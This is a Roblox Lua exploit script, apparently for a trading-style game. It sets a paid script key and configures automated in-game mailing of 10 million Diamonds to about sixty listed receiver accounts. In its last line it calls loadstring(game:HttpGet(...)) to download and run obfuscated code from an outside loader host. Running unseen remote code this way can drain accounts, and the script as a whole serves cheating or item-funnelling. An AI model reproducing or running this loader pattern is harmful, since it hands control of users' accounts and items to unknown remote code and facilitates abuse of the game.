wait()
game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("World1Teleport"):InvokeServer()
wait()
script_key = "LCzvQEVXKsBUaxmNCxIlYkcMDGqWjqfD";
_G.DISABLE_OVERLAY = false -- when true it does not make screen green/red when ready.
_G.GDRY_RUN = false  -- true means just log as test, false means actually send the mails.
_G.GMAIL_ITEMS = {
         -- ["Damage"] = {Class = "Potion",Tier = 2, Amount = 1},
         -- ["Tap Power"] = {Class = "Enchant",Tier = 2, Amount = 1},
        -- ["Comet"] = {Class = "Misc", Amount = 250},
        -- ["Basic Coin Jar"] = {Class = "Misc", Amount = 250},
        -- ["Mini Pinata"] = {Class = "Misc", Amount = 100},
        -- ["Party Box"] = {Class = "Misc", Amount = 100},
        ["Diamonds"] = {Class = "Currency", Amount = "10m"}
}
_G.GMAIL_RECEIVERS = {
"g1B2YW3t",
"v5B2JZ9l",
"l5B2WG6w",
"a8B3GL4h",
"s9B1QR2d",
"a8B1SP5h",
"c7B2FZ1m",
"x0B1FK4l",
"q1B1MD9o",
"r7B3VD8u",
"w9B3SK5a",
"p2B2QN8v",
"p3B3DL3o",
"n2B3SW7b",
"t9B1PV5q",
"t6B2PG4f",
"q3B2CG2f",
"u8B1BN5z",
"g3B1RV1a",
"z9B1VX4z",
"n2B3HG9u",
"d7B3XH2u",
"h8B2CN6w",
"e9B1CV2s",
"x8B3PY5d",
"t0B3TV2v",
"w6B3WV4t",
"w2B1PG5e",
"p5B1PH2f",
"p3B2XK8a",
"x5B1TN0r",
"s4B3BW2s",
"n9B1WZ5g",
"b1B1PL9c",
"h4B3KG1k",
"t9B3DJ0d",
"i6B3QK1u",
"l8B1JF4d",
"o6B2NW0f",
"c0B1GQ1r",
"a9B2XN6k",
"o1B2FD0y",
"b4B1PS6b",
"v3B2DY5w",
"l6B1SJ4p",
"y7B2YY6x",
"g2B2BD1g",
"w4B3WT7f",
"u8B2ST8s",
"t0B3ZL2b",
"i1B1TD7v",
"t3B1JW2q",
"m3B1JX4d",
"d5B2LS7j",
"g9B1ZC8b",
"d8B3BM9p",
"d0B3KL0w",
"v3B1LF2p",
"b2B2VG6k",
"o6B1RY4t",
}
_G.GMAIL_DELAY  = 7.1 -- The time between mails 7.1 is default & tested, don't know if lower gives errors.
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
